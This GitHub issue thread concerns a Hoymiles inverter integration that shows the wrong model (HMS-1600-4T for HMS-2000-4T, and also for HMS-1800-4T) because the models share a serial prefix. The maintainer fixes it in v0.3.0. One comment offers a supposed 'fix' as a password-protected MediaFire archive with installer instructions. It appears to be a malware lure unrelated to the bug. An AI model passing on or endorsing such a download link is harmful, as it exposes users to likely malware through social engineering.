### ISSUE TITLE
incorrect device model detected

### ISSUE THREAD

**Issue by rguenther-dz** [suaveolent/ha-hoymiles-wifi#55]
**Describe the bug**
the device model displayed for the inverter is incorrect.
If HMS-2000-4T is used, HMS-1600-4T is displayed

**To Reproduce**
1. install the integration
2. Einstellungen -> Geräte und Dienste -> Hoymiles -> Geräte
3.  the model shown is HMS-1600-4T

**Expected behavior**
display HMS-2000-4T

**Screenshots**
![grafik](https://github.com/user-attachments/assets/17137cd7-edc6-44b5-b3a4-e9c09a1f8049)

** DTU used **
- DTU-WLite-S

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by suaveolent** [comment]
Thanks. 
 
 Can you post the first 4 digits of your serial number?

**Comment by rguenther-dz** [comment]
The serial number starts with : 1164xxxxxxxx

**Comment by suaveolent** [comment]
Thanks, it seems like they both use the same prefix. I will fix this in the next version.

**Comment by willowHASS** [comment]
Thanks for you fix to the detect the correct type.

It looks like that the HMS-1800-4T has the same serialnumber code.

I am using the HMS-1800-4T.

May serialnumber starts also with 1164xxxxxxxx.

![IMG_9068](https://github.com/user-attachments/assets/b2505856-7ff2-4539-8f78-c7c83604efad)

**Comment by suaveolent** [comment]
Thanks for letting me know. Will push a fix in the next version.

**Comment by suaveolent** [comment]
Fixed with `v0.3.0`.
